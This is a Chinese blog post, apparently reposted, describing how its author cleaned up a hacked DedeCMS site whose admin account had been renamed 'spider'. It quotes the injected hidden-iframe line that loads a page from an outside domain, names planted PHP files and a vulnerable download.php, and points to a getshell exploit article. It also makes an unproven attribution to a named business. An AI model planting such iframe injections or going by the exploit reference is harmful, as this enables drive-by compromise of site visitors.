dede后台提示你的用户名不存在 管理员被改为spider
来源:互联网 发布:手机透明图标软件 编辑:程序博客网 时间:2024/06/07 02:23
今天,打开网站后台,输入,帐号密码进行登录。dede提示你的用户名不存在,我就纳闷了,怎么用户名就不存在了,我又没改。我以为输错了,又输入了一遍。结果还是同样的提示你的用户名不存在。好吧,既然不存在那么我就查查是什么原因吧。首先,上传了dede管理员密码重设工具,打算重置密码,但是看到的不是我常用的账户名,而是一个spider的用户名。如果,你看到网站后台的管理员帐户被给为了spider,那么恭喜你,你遇到的问题和我今天遇到的问题是一样一样的。
先登录FTP,查挂马文件。首先在根目录下找到了一个x.php的文件。发现这个页面是个乱码,乱码的话就说明这个文件没有执行,没有执行那么就还有挂马文件。继续找,又找到了 /plus/90sec.php,大概就能判断出来是这个文件捣鬼的。但是我看90sec很熟的样子,就去搜索了一下。居然是腾讯微博好友Joker(@loveyou09),于是微博求证,得到的答案是否定的,不是他干的。
我很想找到这个拿我站的人,于是我继续找,我发现我的网站没有被挂黑链,按说是不应该的。一个网站被拿之后,不干点什么,总觉得对不起自己的辛苦。我就试试看,看看到底有没有留下点什么。呵呵,皇天不负有心人。终于,让我找到你。
1、在网站头部调用了一个JS文件。<script type=”text/javascript” src=”/Scripts/swfobject.js”></script>
2、这这个JS文件里,有一串调用代码,调用了非本站的页面。<iframe src=http://www.mlwx.cc/web_admin/css/1.htm width=1 height=0></iframe>
3、去查www.mlwx.cc这个网站的备案信息和域名注册信息。域名是2011年6月13日注册的,2012年5月3日备案的。信息全部都是无锡尚美整形美容医院。这里我就不再多说了,根本不用解释。
4、去他们网站商务通留下了我的QQ,让他们技术给我回信息的。我放了句狠话,不加我就恶点竞价。虽然这么说,但是我可没这么干,我知道大家赚钱都不容易,都是为某些企业或客户服务,没有必要大动干戈,以和为贵。人不犯我,我不犯人。人若犯我,呵呵,对不起,虽远必诛!
啰嗦了这么多,下面说下解决办法。用工具先查网站,看看哪个文件有漏洞。
检测后发现,/plus/download.php这个文件有严重的漏洞,个人建议直接删除。然后,把整站下载后,重新检查挂马文件,进行逐一剔除,如果有之前很早的备份那就跟好了。如果你也碰到dede后台提示你的用户名不存在,管理员被改为spider的问题,那么就建议你要看看这篇文章了《dedecms最新版本修改任意管理员漏洞+getshell+exp》。
- dede后台提示你的用户名不存在 管理员被改为spider
- dede后台提示你的用户名不存在 管理员被改为spider
- 织梦后台提示用户名不存在 查看数据库用户名被改为spider
- 织梦后台提示用户名不存在 查看数据库用户名被改为spider
- dedecms提示“你的用户名不存在”
- 后台用户名不存在,密码被修改,spider,新漏洞轻松注入改后台密码
- dedecms织梦后台提示用户名不存在
- dedecms织梦后台提示用户名不存在
- DedeCMS : 你的用户名不存在?
- onethink后台一直提示验证码不正确,或提示用户名不存在或被禁用
- 关于Dede后台你指定的文件名…
- oracle 修改用户密码提示用户名不存在
- dede验证码不显示,dede图集后台上传图片报错 提示红色FILEID错误的处理办法
- dede后台用户名和密码不知道办?
- 破解dede的后台密码
- dede后台的标签整理
- dede后台路径的修改
- dede图集后台上传图片报错 提示红色FILEID错误的处理办法
- String类是否可以继承?
- 【电脑无法识别移动硬盘的五种可能】
- 金山开源代码研究之一
- 利用SVN进行源代码管理
- mingw + eclipse juno
- dede后台提示你的用户名不存在 管理员被改为spider
- 用 CloudStack 配置和管理一个简单云
- Java----类加载器
- 往死里写——MBX_Main()
- hdu_1372 Knight Moves
- 音乐小程序
- RTB竞价中的cookie mapping技术
- 本周的工作内容和生活事项繁多时间分配安排危急
- 页面跳转。挺好用